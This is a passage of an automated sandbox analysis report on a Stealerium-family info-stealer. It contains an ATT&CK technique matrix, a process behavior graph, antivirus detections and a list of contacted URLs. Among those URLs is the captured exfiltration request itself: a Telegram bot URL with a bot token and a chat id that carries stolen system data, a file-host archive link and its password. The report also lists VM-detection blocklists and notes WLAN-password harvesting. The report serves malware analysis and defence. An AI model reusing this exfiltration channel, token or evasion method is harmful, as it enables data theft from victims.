                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		2
                          Valid Accounts                          		131
                          Windows Management Instrumentation                          		1
                          Scripting                          		1
                          Exploitation for Privilege Escalation                          		121
                          Disable or Modify Tools                          		1
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services11
                          Archive Collected Data                          		1
                          Web Service                          		Exfiltration Over Other Network Medium1
                          Data Encrypted for Impact
                          CredentialsDomainsDefault Accounts11
                          Native API                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		11
                          Deobfuscate/Decode Files or Information                          		221
                          Input Capture                          		1
                          Account Discovery                          		Remote Desktop Protocol2
                          Data from Local System                          		2
                          Ingress Tool Transfer                          		Exfiltration Over Bluetooth1
                          System Shutdown/Reboot
                          Email AddressesDNS ServerDomain Accounts1
                          Scheduled Task/Job                          		2
                          Valid Accounts                          		2
                          Valid Accounts                          		2
                          Obfuscated Files or Information                          		Security Account Manager2
                          File and Directory Discovery                          		SMB/Windows Admin Shares1
                          Screen Capture                          		11
                          Encrypted Channel                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCron1
                          Scheduled Task/Job                          		21
                          Access Token Manipulation                          		1
                          Software Packing                          		NTDS138
                          System Information Discovery                          		Distributed Component Object Model1
                          Email Collection                          		3
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                          Process Injection                          		1
                          Timestomp                          		LSA Secrets1
                          Query Registry                          		SSH221
                          Input Capture                          		14
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                          Scheduled Task/Job                          		1
                          DLL Side-Loading                          		Cached Domain Credentials361
                          Security Software Discovery                          		VNC4
                          Clipboard Data                          		Multiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Masquerading                          		DCSync261
                          Virtualization/Sandbox Evasion                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                          Valid Accounts                          		Proc Filesystem3
                          Process Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt261
                          Virtualization/Sandbox Evasion                          		/etc/passwd and /etc/shadow11
                          Application Window Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                          Access Token Manipulation                          		Network Sniffing1
                          System Owner/User Discovery                          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                          Process Injection                          		Input Capture1
                          System Network Configuration Discovery                          		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565141 Sample: LKxcbzlwkz.exe Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 70 api.telegram.org 2->70 72 szurubooru.zulipchat.com 2->72 74 6 other IPs or domains 2->74 88 Suricata IDS alerts for network traffic 2->88 90 Found malware configuration 2->90 92 Malicious sample detected (through community Yara rule) 2->92 96 21 other signatures 2->96 9 LKxcbzlwkz.exe 29 2->9         started        14 msiexec.exe 2->14         started        signatures3 94 Uses the Telegram API (likely for C&C communication) 70->94 process4 dnsIp5 76 ip-score.com 188.138.68.212, 443, 49731, 49738 GD-EMEA-DC-SXB1DE Germany 9->76 78 192.168.0.82, 49730, 49752, 49754 unknown unknown 9->78 60 C:\Users\user\AppData\Local\...\aut66E4.tmp, PE32+ 9->60 dropped 62 C:\Users\user\AppData\Local\Temp\JOUNLV.exe, PE32+ 9->62 dropped 102 Found many strings related to Crypto-Wallets (likely being stolen) 9->102 104 Installs a global keyboard hook 9->104 16 JOUNLV.exe 14 123 9->16         started        21 cmd.exe 1 9->21         started        file6 signatures7 process8 dnsIp9 64 szurubooru.zulipchat.com 50.17.0.11, 443, 49751 AMAZON-AESUS United States 16->64 66 api.telegram.org 149.154.167.220, 443, 49739, 49748 TELEGRAMRU United Kingdom 16->66 68 4 other IPs or domains 16->68 52 C:\Users\user\AppData\...\YPSIACHYXW.docx, ASCII 16->52 dropped 54 C:\Users\user\AppData\...\WUTJSCBCFX.docx, ASCII 16->54 dropped 56 C:\Users\user\AppData\...56IKHQAIQAU.pdf, ASCII 16->56 dropped 58 C:\Users\user\...\user@724536_en-CH.zip, Zip 16->58 dropped 80 Antivirus detection for dropped file 16->80 82 Multi AV Scanner detection for dropped file 16->82 84 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->84 86 7 other signatures 16->86 23 cmd.exe 1 16->23         started        26 cmd.exe 16->26         started        28 cmd.exe 1 16->28         started        30 conhost.exe 21->30         started        32 openfiles.exe 1 21->32         started        file10 signatures11 process12 signatures13 98 Uses netsh to modify the Windows network and firewall settings 23->98 100 Tries to harvest and steal WLAN passwords 23->100 34 netsh.exe 2 23->34         started        36 conhost.exe 23->36         started        38 findstr.exe 1 23->38         started        40 chcp.com 1 23->40         started        42 conhost.exe 26->42         started        50 3 other processes 26->50 44 conhost.exe 28->44         started        46 chcp.com 28->46         started        48 netsh.exe 28->48         started        process14

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          LKxcbzlwkz.exe79%ReversingLabsWin32.Trojan.Nymeria
                          LKxcbzlwkz.exe100%AviraHEUR/AGEN.1321697
                          LKxcbzlwkz.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\aut66E4.tmp100%AviraTR/AVI.Stealerium.sbcde
                          C:\Users\user\AppData\Local\Temp\JOUNLV.exe100%AviraTR/AVI.Stealerium.sbcde
                          C:\Users\user\AppData\Local\Temp\aut66E4.tmp100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\JOUNLV.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\JOUNLV.exe66%ReversingLabsByteCode-MSIL.Trojan.Zilla
                          C:\Users\user\AppData\Local\Temp\aut66E4.tmp66%ReversingLabsByteCode-MSIL.Trojan.Zilla

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://szurubooru.zulipchat.com0%Avira URL Cloudsafe
                          http://szurubooru.zulipchat.com0%Avira URL Cloudsafe
                          https://szurubooru.zulipchat.com/api/v1/messages0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          szurubooru.zulipchat.com
                          		50.17.0.11
                          		truetrue
                            		unknown
                            raw.githubusercontent.com
                            		185.199.110.133
                            		truefalse
                              		high
                              store6.gofile.io
                              		31.14.70.249
                              		truefalse
                                		high
                                ip-score.com
                                		188.138.68.212
                                		truefalse
                                  		high
                                  api.telegram.org
                                  		149.154.167.220
                                  		truefalse
                                    		high
                                    api.gofile.io
                                    		45.112.123.126
                                    		truefalse
                                      		high
                                      icanhazip.com
                                      		104.16.184.241
                                      		truefalse
                                        		high
                                        56.14.11.0.in-addr.arpa
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://icanhazip.com/false
                                            		high
                                            https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txtfalse
                                              		high
                                              https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/getMefalse
                                                		high
                                                https://ip-score.com/checkip/false
                                                  		high
                                                  https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage?chat_id=-4556397073&text=%60%60%60%0A%F0%9F%98%B9%20%2AStealerium%20v3.5.2%20-%20Report%3A%2A%0ADate%3A%202024-11-29%204%3A57%3A07%20am%0ASystem%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0AUsername%3A%20user%0ACompName%3A%20724536%0ALanguage%3A%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus%3A%20Windows%20Defender%0A%0A%F0%9F%92%BB%20%2AHardware%3A%2A%0ACPU%3A%20Intel%28R%29%20Core%28TM%292%20CPU%206600%20%40%202.40%20GHz%0AGPU%3A%20PA_NMRCU%0ARAM%3A%204095MB%0APower%3A%20NoSystemBattery%20%28100%25%29%0AScreen%3A%201280x1024%0AWebcams%20count%3A%200%0A%0A%F0%9F%93%A1%20%2ANetwork%3A%2A%20%0AGateway%20IP%3A%20192.168.2.1%0AInternal%20IP%3A%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system%21%0AExternal%20IP%3A%208.46.123.228%0A%0A%F0%9F%92%B8%20%2ADomains%20info%3A%2A%0A%20%20%20-%20%F0%9F%8F%A6%20%2ABanking%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20%2ACryptocurrency%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%8D%93%20%2APorn%20websites%2A%20%28No%20data%29%0A%0A%F0%9F%8C%90%20%2ABrowsers%3A%2A%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History%3A%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks%3A%205%0A%0A%F0%9F%97%83%20%2ASoftware%3A%2A%0A%0A%F0%9F%A7%AD%20%2ADevice%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%F0%9F%A6%A0%20%2AInstallation%3A%2A%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Startup%20disabled%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Clipper%20not%20installed%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Keylogger%20not%20installed%0A%0A%F0%9F%93%84%20%2AFile%20Grabber%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images%3A%2020%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents%3A%2030%0A%0A%F0%9F%94%97%20%5BArchive%20download%20link%5D%28https%3A%2F%2Fgofile.io%2Fd%2FliMaKC%29%0A%F0%9F%94%90%20Archive%20password%20is%3A%20%227035101d0d346f9a1fd3ad400ac83b90%22%60%60%60&parse_mode=Markdown&disable_web_page_preview=Truefalse
                                                    		high
                                                    https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txtfalse
                                                      		high
                                                      https://store6.gofile.io/uploadfilefalse
                                                        		high
                                                        https://szurubooru.zulipchat.com/api/v1/messagestrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://api.gofile.io/serversfalse
                                                          		high
                                                          https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txtfalse
                                                            		high
                                                            https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txtfalse
                                                              		high
                                                              https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txtfalse
                                                                		high
                                                                https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txtfalse
                                                                  		high

                                                                  URLs from Memory and Binaries

                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                  https://duckduckgo.com/chrome_newtabtmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse
                                                                    		high
                                                                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFtmp42BD.tmp.dat.1.drfalse
                                                                      		high
                                                                      http://ip-score.com/checkip/TTC:LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://duckduckgo.com/ac/?q=tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse
                                                                          		high
                                                                          https://github.com/dotnet/runtime8JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://api.telegram.orgJOUNLV.exe, 00000001.00000002.2015535093.000001BB38175000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://api.telegram.org/botJOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ip-score.com/checkip/HC:LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://ip-score.com/checkip/3LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://store6.gofile.io/XJOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://ip-score.com/LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.newtonsoft.com/jsonJOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://store6.gofile.ioJOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse
                                                                                              		high
                                                                                              https://gofile.io/d/liMaKC)JOUNLV.exe, 00000001.00000002.2015535093.000001BB381CC000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessageJOUNLV.exe, 00000001.00000002.2015535093.000001BB38175000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17tmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.drfalse
                                                                                                    		high
                                                                                                    https://api.gofile.io/JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://github.com/dotnet/runtimeJOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://ip-score.com/checkip/ficLKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drfalse
                                                                                                            		high
                                                                                                            http://ip-score.com/checkip/oftLKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://ip-score.com/checkip/1865LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://aka.ms/dotnet-warnings/JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://ip-score.com/checkip/WLKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://ip-score.com/checkip/yiLkZLKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstalltmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.drfalse
                                                                                                                        		high
                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse
                                                                                                                          		high
                                                                                                                          https://aka.ms/serializationformat-binary-obsoleteJOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.autoitscript.com/autoit3/files/beta/autoit/archive/sqlite/SQLite3LKxcbzlwkz.exe, 00000000.00000002.3000735536.00000000017D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://aka.ms/binaryformatterJOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://raw.githubusercontent.com/icsharpcode/SharpZipLib/33f64eb0f28cdd2b084cb822fcc224c7c5aba553/JOUNLV.exe, 00000001.00000002.2024985170.000001BB50D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://icanhazip.comJOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB384E9000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://api.gofile.ioJOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage?chat_id=-4556JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB381AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameJOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://github.com/JamesNK/Newtonsoft.JsonJOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://api.gofile.ioJOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://ip-score.com/checkip/TTC:LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://ip-score.com/checkip/ificatesLKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://github.com/kgnfthJOUNLV.exe.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://ip-score.com/checkip/C:LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000B3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://github.com/icsharpcode/SharpZipLibJOUNLV.exe, 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015451084.000001BB37DC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://ip-score.com/checkip/nLKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://ip-score.com/checkip/.com/checkip/ificatesLKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://ip-score.com/checkip/65LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016tmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://ip-score.com/checkip/LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://store6.gofile.ioJOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://www.ecosia.org/newtab/tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://szurubooru.zulipchat.comJOUNLV.exe, 00000001.00000002.2015535093.000001BB381D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtmp42BD.tmp.dat.1.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://ip-score.com/checkip/2LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://james.newtonking.com/projects/jsonJOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://ac.ecosia.org/autocomplete?q=tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://szurubooru.zulipchat.comJOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://ip-score.com/checkip/OLKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://ip-score.com/checkip/erseLKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://raw.githubusercontent.comJOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://ip-score.com/checkip/.com/checkip/LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://ip-score.com/owsLKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://ip-score.com/checkip/C1%k.LKxcbzlwkz.exe, 00000000.00000002.3000735536.00000000017D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://www.newtonsoft.com/jsonschemaJOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://ip-score.com/checkip/LMEMLKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://www.nuget.org/packages/Newtonsoft.Json.BsonJOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
